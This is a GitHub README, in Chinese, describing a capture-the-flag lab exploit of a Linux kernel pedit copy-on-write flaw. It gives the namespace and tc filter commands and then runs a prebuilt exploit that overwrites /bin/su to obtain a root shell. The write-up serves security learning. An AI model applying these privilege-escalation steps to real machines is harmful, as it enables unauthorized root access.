MarwahHadi/CVE-2026-46331-pedit-cow
GitHub: MarwahHadi/CVE-2026-46331-pedit-cow
该项目是 Linux 内核 pedit COW 漏洞(CVE-2026-46331)的分析说明与利用步骤写-up,演示了如何通过流量控制子系统缺陷实现本地提权。
Stars: 0 | Forks: 0
# CVE-2026-46331-pedit-cow
关于 pedit COW 漏洞 (CVE-2026-46331) 的分析说明与利用步骤。
## 概述
该挑战展示了 pedit COW,这是 Linux 内核流量控制子系统中数据包编辑操作 (`act_pedit`) 的一个缺陷。该漏洞允许非特权用户覆盖 setuid-root 二进制文件的内存副本,从而无需触及磁盘上的文件即可获取 root shell。
## 利用步骤
### 1. 初始设置
环境以非特权用户 (`karen`) 身份启动。
```
id
cd ~/packet_edit_meme
make packet_edit_meme
```
### 2. 提权(创建 Namespace)
配置流量控制通常需要 CAP_NET_ADMIN 权限,而普通用户不具备此权限。我利用了非特权用户 namespace 来获取该权限。
```
unshare -r -n
```
### 3. 配置流量控制操作
在 namespace 内,我配置了 clsact qdisc 并应用了过滤器来触发 pedit 操作。
# 如有需要,清理任何现有配置
```
tc qdisc del dev lo clsact
```
# 设置 qdisc 和过滤器
```
tc qdisc add dev lo clsact
```
```
tc filter add dev lo egress matchall action pedit ex munge ip ttl set 64
```
### 4. 执行漏洞利用
设置好环境后,我退出了 root shell 并以非特权用户身份执行了漏洞利用程序。
```
exit
./packet_edit_meme
```
### 5. 最终结果
该漏洞利用成功覆盖了 /bin/su 的入口,提供了一个交互式的 root shell。
```
# cat /root/flag.txt
```
THM{YOUR_FLAG_HERE}
标签:Linux内核, Web报告查看器, 安全渗透, 本地提权, 漏洞分析, 网络安全, 路径探测, 隐私保护